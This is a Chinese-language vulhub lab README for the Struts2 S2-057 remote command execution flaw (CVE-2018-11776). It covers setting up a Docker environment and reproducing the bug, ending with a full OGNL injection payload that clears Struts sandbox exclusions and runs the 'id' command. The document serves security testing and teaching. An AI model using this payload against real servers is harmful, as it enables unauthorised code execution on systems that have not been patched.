aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
main
vulhub/struts2/s2-057/README.zh-cn.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details
first commit
2025-09-06 16:08:15 +08:00

1.6 KiB
Raw Permalink Blame History

Struts2 S2-057 远程命令执行漏洞CVE-2018-11776

当Struts2的配置满足以下条件时

  • alwaysSelectFullNamespace值为true
  • action元素未设置namespace属性或使用了通配符

namespace将由用户从uri传入并作为OGNL表达式计算最终造成任意命令执行漏洞。

影响版本: 小于等于 Struts 2.3.34 与 Struts 2.5.16

漏洞详情:

漏洞环境

启动满足条件的 Struts 2.3.34 环境:

docker compose up -d

环境启动后,访问http://your-ip:8080/showcase/将可以看到Struts2的测试页面。

漏洞复现

测试OGNL表达式${233*233}

http://your-ip:8080/struts2-showcase/$%7B233*233%7D/actionChain1.action

可见233*233的结果已返回在Location头中。

使用S2-057原理分析与复现过程POC中给出的执行任意命令的OGNL表达式

${
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

可见id命令已成功执行